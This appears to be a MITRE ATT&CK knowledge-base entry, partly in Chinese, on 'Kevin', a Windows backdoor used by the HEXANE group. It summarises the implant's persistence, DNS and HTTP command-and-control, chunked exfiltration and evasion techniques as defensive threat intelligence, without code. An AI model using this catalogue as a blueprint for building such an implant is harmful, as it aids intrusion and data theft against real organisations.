1. Home
  2. Software
  3. Kevin

Kevin

Kevin is a backdoor implant written in C++ that has been used by HEXANE since at least June 2020, including in operations against organizations in Tunisia.[1]

ID: S1020
Type: MALWARE
Platforms: Windows
Version: 1.1
Created: 14 June 2022
Last Modified: 17 April 2024
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1546 .003 事件触发执行: Windows Management Instrumentation Event Subscription

Kevin can compile randomly-generated MOF files into the WMI repository to persistently run malware.[1]
Enterprise T1005 从本地系统获取数据

Kevin can upload logs and other data from a compromised host.[1]
Enterprise T1036 .003 伪装: Rename System Utilities

Kevin has renamed an image of cmd.exe with a random name followed by a .tmpl extension.[1]
Enterprise T1572 协议隧道

Kevin can use a custom protocol tunneled through DNS or HTTP.[1]
Enterprise T1059 .003 命令与脚本解释器: Windows Command Shell

Kevin can use a renamed image of cmd.exe for execution.[1]
Enterprise T1008 回退信道

Kevin can assign hard-coded fallback domains for C2.[1]
Enterprise T1071 .001 应用层协议: Web Protocols

Variants of Kevin can communicate with C2 over HTTP.[1]
.004 应用层协议: DNS

Variants of Kevin can communicate over DNS through queries to the server for constructed domain names with embedded information.[1]
Enterprise T1030 数据传输大小限制

Kevin can exfiltrate data to the C2 server in 27-character chunks.[1]
Enterprise T1074 数据分段

Kevin can create directories to store logs and other collected data.[1]
Enterprise T1001 .001 数据混淆: Junk Data

Kevin can generate a sequence of dummy HTTP C2 requests to obscure traffic.[1]
Enterprise T1132 .001 数据编码: Standard Encoding

Kevin can Base32 encode chunks of output files during exfiltration.[1]
Enterprise T1106 本机API

Kevin can use the ShowWindow API to avoid detection.[1]
Enterprise T1027 .013 混淆文件或信息: Encrypted/Encoded File

Kevin has Base64-encoded its configuration file.[1]
Enterprise T1070 .004 移除指标: File Deletion

Kevin can delete files created on the victim's machine.[1]
Enterprise T1082 系统信息发现

Kevin can enumerate the OS version and hostname of a targeted machine.[1]
Enterprise T1016 系统网络配置发现

Kevin can collect the MAC address and other information from a victim machine using ipconfig/all.[1]
Enterprise T1497 虚拟化/沙盒规避

Kevin can sleep for a time interval between C2 communication attempts.[1]
Enterprise T1105 输入工具传输

Kevin can download files to the compromised host.[1]
Enterprise T1041 通过C2信道渗出

Kevin can send data from the victim host through a DNS C2 channel.[1]
Enterprise T1564 .003 隐藏伪装: Hidden Window

Kevin can hide the current window from the targeted user via the ShowWindow API function.[1]

Groups That Use This Software

ID Name References
G1001 HEXANE

[1]

References

  1. Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.